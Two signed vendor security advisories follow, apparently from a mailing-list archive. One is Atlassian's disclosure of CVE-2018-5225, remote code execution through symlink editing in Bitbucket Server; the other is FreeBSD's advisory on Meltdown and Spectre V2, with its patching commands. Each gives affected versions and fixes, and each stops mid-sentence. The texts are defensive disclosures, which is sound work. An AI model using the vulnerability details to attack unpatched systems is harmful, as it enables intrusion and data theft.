-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 This email refers to the advisory found at https://confluence.atlassian.com/x/3WNsO CVE ID: CVE-2018-5225 Products: Bitbucket Server Affected Bitbucket Server Versions: 4.13.0 <= version < 5.4.8 5.5.0 <= version < 5.5.8 5.6.0 <= version < 5.6.5 5.7.0 <= version < 5.7.3 5.8.0 <= version < 5.8.2 Fixed Bitbucket Server Versions: 5.4.8 5.5.8 5.6.5 5.7.3 5.8.2 5.9.0 Summary: This advisory discloses a critical severity security vulnerability which was introduced in version 4.13.0 of Bitbucket Server. All versions of Bitbucket Server before 5.4.8 (the fixed version for 4.13.0 through to 5.4.7), 5.5.0 before 5.5.8 (the fixed version for 5.5.x), 5.6.0 before 5.6.5 (the fixed version for 5.6.x), 5.7.0 before 5.7.3 (the fixed version for 5.7.x), and 5.8.0 before 5.8.2 (the fixed version for 5.8.x) are affected by this vulnerability. Bitbucket Server 5.9.0 is not impacted by this vulnerability. Customers who have upgraded Bitbucket Server to version 5.4.8, 5.5.8, 5.6.5, 5.7.3, 5.8.2 or 5.9.0 are not affected. Customers who have downloaded and installed Bitbucket Server >= 4.13.0 less than 5.4.8 (the fixed version for 4.13.0 through to 5.4.7), and Bitbucket Server >= 5.5.0 less than 5.5.8 (the fixed version for 5.5.x), and Bitbucket Server >= 5.6.0 less than 5.6.5 (the fixed version for 5.6.x), and Bitbucket Server >= 5.7.0 less than 5.7.3 (the fixed version for 5.7.x), and Bitbucket Server >= 5.8.0 less than 5.8.2 (the fixed version for 5.8.x) Please upgrade your Bitbucket Server installations immediately to fix this vulnerability. Remote Code Execution via In Browser Editing - CVE-2018-5225 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: An authenticated user of Bitbucket Server could gain remote code execution using the in-browser editing feature via editing a symbolic link within a repository. All versions of Bitbucket Server before 5.4.8 (the fixed version for 4.13.0 through to 5.4.7), 5.5.0 before 5.5.8 (the fixed version for 5.5.x), 5.6.0 before 5.6.5 (the fixed version for 5.6.x), 5.7.0 before 5.7.3 (the fixed version for 5.7.x), and 5.8.0 before 5.8.2 (the fixed version for 5.8.x) are affected by this vulnerability. Bitbucket Server 5.9.0 is not impacted by this vulnerability. This issue can be tracked here: Fix We have taken the following steps to address this issue: Released Bitbucket Server version 5.9.0 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download. Released Bitbucket Server version 5.8.2 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives. Released Bitbucket Server version 5.7.3 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives. Released Bitbucket Server version 5.6.5 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives. Released Bitbucket Server version 5.5.8 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives. Released Bitbucket Server version 5.4.8 that contains a fix for this issue and can be downloaded from https://www.atlassian.com/software/bitbucket/download-archives. What You Need to Do: Atlassian recommends that you upgrade to the latest version. For a full description of the latest version of Bitbucket Server, see the release notes. You can download the latest version of Bitbucket Server from the download centre. Mitigation: If you are running an affected version of Bitbucket Server and cannot upgrade to an unaffected version the following mitigation can be performed: Set feature.file.editor=false in the bitbucket.properties file Restart Bitbucket Server for changes to become effective Please note that this mitigation does not mitigate against vulnerabilities where third party plugins use the file editing API programatically. Support: If you did not receive an email for this advisory and you wish to receive such emails in the future go to https://my.atlassian.com/email and subscribe to the Alerts emails. If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/. References: Security Bug fix Policy As per our new policy critical security bug fixes will be back ported in accordance with https://www.atlassian.com/trust/security/bug-fix-policy. We will release new bug fix releases for the versions covered by the new policy instead of binary patches. Binary patches are no
FreeBSD Security Advisory FreeBSD-SA-18:03.speculative_execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:03.speculative_execution Security Advisory The FreeBSD Project Topic: Speculative Execution Vulnerabilities Category: core Module: kernel Announced: 2018-03-14 Credits:Jann Horn (Google Project Zero); Werner Haas, Thomas Prescher (Cyberus Technology); Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz (Graz University of Technology); Paul Kocher; Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus); Yuval Yarom (University of Adelaide and Data6) Affects:All supported versions of FreeBSD. Corrected: 2018-02-17 18:00:01 UTC (stable/11, 11.1-STABLE) 2018-03-14 04:00:00 UTC (releng/11.1, 11.1-RELEASE-p8) CVE Name: CVE-2017-5715, CVE-2017-5754 Special Note: Speculative execution vulnerability mitigation is a work in progress. This advisory addresses the most significant issues for FreeBSD 11.1 on amd64 CPUs. We expect to update this advisory to include 10.x for amd64 CPUs. Future FreeBSD releases will address this issue on i386 and other CPUs. freebsd-update will include changes on i386 as part of this update due to common code changes shared between amd64 and i386, however it contains no functional changes for i386 (in particular, it does not mitigate the issue on i386). For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background Many modern processors have implementation issues that allow unprivileged attackers to bypass user-kernel or inter-process memory access restrictions by exploiting speculative execution and shared resources (for example, caches). II. Problem Description A number of issues relating to speculative execution were found last year and publicly announced January 3rd. Two of these, known as Meltdown and Spectre V2, are addressed here. CVE-2017-5754 (Meltdown) - This issue relies on an affected CPU speculatively executing instructions beyond a faulting instruction. When this happens, changes to architectural state are not committed, but observable changes may be left in micro- architectural state (for example, cache). This may be used to infer privileged data. CVE-2017-5715 (Spectre V2) - -- Spectre V2 uses branch target injection to speculatively execute kernel code at an address under the control of an attacker. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility, followed by a reboot into the new kernel: # freebsd-update fetch # freebsd-update install # shutdown -r now 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch.asc # gpg --verify speculative_execution-amd64-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details CVE-2017-5754 (Meltdown) - The mitigation is known as Page Table Isolation (PTI). PTI largely separates kernel and user mode page tables, so that even during speculative execution most of the kernel's data is unmapped and not accessible. A demonstration of the Meltdown vulnerability is available at https://github.com/dag-erling/meltdown. A positive result is definitive (that is, the vulnerability exists with certainty). A negative result indicates either that the CPU is not affected, or that the test is not capable of demonstrating the is